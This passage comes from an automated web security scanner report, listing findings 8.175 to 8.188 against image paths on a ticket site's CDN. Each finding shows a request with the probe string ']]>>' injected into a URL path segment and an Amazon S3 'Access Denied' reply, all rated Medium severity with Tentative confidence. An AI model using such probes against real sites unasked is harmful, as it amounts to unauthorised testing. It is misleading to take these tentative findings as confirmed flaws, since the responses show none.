x-amz-request-id: A85352D7054B4460
x-amz-id-2: R2hMdQkCwaCGCcSgAgufnhEYmq70PWbmF6h0+fSPqHCqNpss1sjwPHAD8wkVBe0X
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:47 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 819bd66e0793055bdc8abd1c678c4145623e06505fd5ed27f7e87430fc5dcb289ae535a022234faf
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A85352D7054B4460</RequestId><HostId>R2hMdQkCwaCGCcSgAgufnhEYmq70PWbmF6h0+fSPqHCqNpss1s
...[SNIP]...

8.175. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff9933-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E38392E45A7EB899
x-amz-id-2: BaCpJ72F31aCcAohZTcWFoYxz79LQLOuVuzrRVifa0aWRuojSqNeQ/mZdUdIfjTE
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:51 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 5d09748321da7049ae73d487c159196d0fc9f18342b9e8597ab2338258ca56f3eb54b4c1340354fb
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E38392E45A7EB899</RequestId><HostId>BaCpJ72F31aCcAohZTcWFoYxz79LQLOuVuzrRVifa0aWRuojSq
...[SNIP]...

8.176. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff9933-ff6633-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E548C489DE587ED2
x-amz-id-2: GyRvXBb4DoxKJFsJloe+OPdmTSBY+5HfQRdzXPM8uZx2YfwrVbK7Fe8pZJowf92M
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 296e5c8f7cb9f665973eb671972da207c0a4549a42cec0425abc4b4039082dcfca441479fb833525
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E548C489DE587ED2</RequestId><HostId>GyRvXBb4DoxKJFsJloe+OPdmTSBY+5HfQRdzXPM8uZx2YfwrVb
...[SNIP]...

8.177. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F677591E58F78048
x-amz-id-2: AaZTh7uoYHgzfzXP5qs0XhDrk9vCa5S1dUpOnu0aNldqVfaC7fvsNgKwms23KsUf
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bbcd193fb57335bc99b2ede09175ac3a0e0d650098dc3f1588793178b1b3e8ab1f8743fd023b6023
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F677591E58F78048</RequestId><HostId>AaZTh7uoYHgzfzXP5qs0XhDrk9vCa5S1dUpOnu0aNldqVfaC7f
...[SNIP]...

8.178. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff9933-ff9933-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 579501718D9AD30D
x-amz-id-2: +pGROg6yM4QGqiPV9z57wPYfIdlIHlXhrnT/NQMFjt9o99fy1KtnjZMKCxptkc0/
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 51ce0d601585cb0437213d53d16b45d22db9dace54a77c32f75d01f302c12163e264cf877e3cc1f4
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>579501718D9AD30D</RequestId><HostId>+pGROg6yM4QGqiPV9z57wPYfIdlIHlXhrnT/NQMFjt9o99fy1K
...[SNIP]...

8.179. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff9933-ff9933-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 040861B1FF9F3BE6
x-amz-id-2: H8NKDLVdebN1Iql+UPsROzGIzeJtou5v9RcGT6zigEG2+/z5HPyM6Ep6kVDUTG6r
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:17 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ce843d90b88ab8d228742ca04c829010941f0f7c76e6ecd60965f535a87cdc01aa1dedeabac4a095
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>040861B1FF9F3BE6</RequestId><HostId>H8NKDLVdebN1Iql+UPsROzGIzeJtou5v9RcGT6zigEG2+/z5HP
...[SNIP]...

8.180. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff9933-ff9933-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0AC8E59FD82BB056
x-amz-id-2: CuFuHiZoTRnkAyEg0bBrPBWSOkJn0/QaybBTzxYOm+k+0AAxWVrsAVuKoVEs6ijs
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:24 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 15ec0deb01e24f1db109f95a2d66a39ab2f6e1ac12ecdea297f1a92abd365f4e23a9c8d5344a8f82
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0AC8E59FD82BB056</RequestId><HostId>CuFuHiZoTRnkAyEg0bBrPBWSOkJn0/QaybBTzxYOm+k+0AAxWV
...[SNIP]...

8.181. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A65854E64607646F
x-amz-id-2: HI4RH0xlk8O8qIP9vkAOYmndpmVbw+vcnfIy0x+gy3QPkaq1qcdg8HZXhFbZqOf/
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:29 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d36d914bf5fe47bfa918c61fe52d2bebdbb4509553f6167b895871a5a5ca7f3ffbb53b74466e0099
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A65854E64607646F</RequestId><HostId>HI4RH0xlk8O8qIP9vkAOYmndpmVbw+vcnfIy0x+gy3QPkaq1qc
...[SNIP]...

8.182. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ffcc00-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A243DB00D49611A6
x-amz-id-2: MqWk29Jfu4TmEe63/ttCMR/y8wg7TIWqyNW/MaUpvAs6WPyVK8r3SBRHKCSIROfD
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:59 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6b9eef029b07f8e2bdafbfbad79fd5f7495a4cf68c7c61d4908d1da14754f5f6b805c3ac5c2e46ee
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A243DB00D49611A6</RequestId><HostId>MqWk29Jfu4TmEe63/ttCMR/y8wg7TIWqyNW/MaUpvAs6WPyVK8
...[SNIP]...

8.183. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ffcc00-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 7227684629869AB4
x-amz-id-2: dwUQWEsH6XQy/yUESKtVCED3u1Ywnt4j8VBJkA7R/c56VSVuAAdcNbh/rgwTDMvv
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:10 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bd2f10b3f1a38b3ec551def7e7ade538fdc2cdd52e33a11c7f07854e8edd84b9adbf094693a7a6fe
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>7227684629869AB4</RequestId><HostId>dwUQWEsH6XQy/yUESKtVCED3u1Ywnt4j8VBJkA7R/c56VSVuAA
...[SNIP]...

8.184. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ffcc00-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: B35C7AD3ACB2B88D
x-amz-id-2: sWHbpfZ2JbDvQWiRHuKuMm++jXXYy3r18/9d/4GjORtjvc3jtZ4gtfRvPHEVEivc
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:16 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bccb9ba240443cd19f0d56065295eb9cbb5208690a9301865a4152e39a455995d96cba00534080b8
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B35C7AD3ACB2B88D</RequestId><HostId>sWHbpfZ2JbDvQWiRHuKuMm++jXXYy3r18/9d/4GjORtjvc3jtZ
...[SNIP]...

8.185. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 69085058C5FCE758
x-amz-id-2: e+OBDc+G7WJaTzdcxYBqHcXlRH6WNVPu1PncfBe7CkVht3AHgJFSOTUkbXT396nH
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:20 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 62ed7f090a2d684ccb0d6659b0e0eedb3e47dfef185708566f10151e17cab2385b5a531a846f677c
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>69085058C5FCE758</RequestId><HostId>e+OBDc+G7WJaTzdcxYBqHcXlRH6WNVPu1PncfBe7CkVht3AHgJ
...[SNIP]...

8.186. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ffcc00-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E6FB1F88FD52B973
x-amz-id-2: dA2V2asFBjF+0Q11clc+7fv+QavPzXknvc0wV2mHFFwlHu4LEezULV5zIwr2hnHJ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:55 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 369fa9fdc2aea250c2a356e8e676da18301ee799766608e03bd59ec889f9bb1d2dd9b1f2a8d35ef0
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E6FB1F88FD52B973</RequestId><HostId>dA2V2asFBjF+0Q11clc+7fv+QavPzXknvc0wV2mHFFwlHu4LEe
...[SNIP]...

8.187. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ffcc00-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A090C566E176FCEF
x-amz-id-2: 92jXgy3XHrsw0O1HKkgQ/AZTfVejgvMOFmrm9072gcpcJVGuuX5bQYIB7YXaFUXt
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f89935bf25caa3acf7275a5964974e2c824cb0cf0dc984fbb83a55752fcb39adffafb50bb165a5d7
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A090C566E176FCEF</RequestId><HostId>92jXgy3XHrsw0O1HKkgQ/AZTfVejgvMOFmrm9072gcpcJVGuuX
...[SNIP]...

8.188. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-2.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ffcc00-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AC8F4BBCE4311DDC
x-amz-id-2: sFPVFRlORTnMx/NCSwGmleH77AEaBR1l8dDTLOF0w4Ddy5Z6fUrR2uxvjQ1du4Np
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:15 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c4f06f29fe2f520842c02a226d93bf131d0bbeb1a09f07f2e361e24cb2a1a6152ee7c7498c03667c
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AC8F4BBCE4311DDC</RequestId><HostId>sFPVFRlORTnMx/NCSwGmleH77AEaBR1l8dDTLOF0w4Ddy5Z6fU
...[SNIP]...

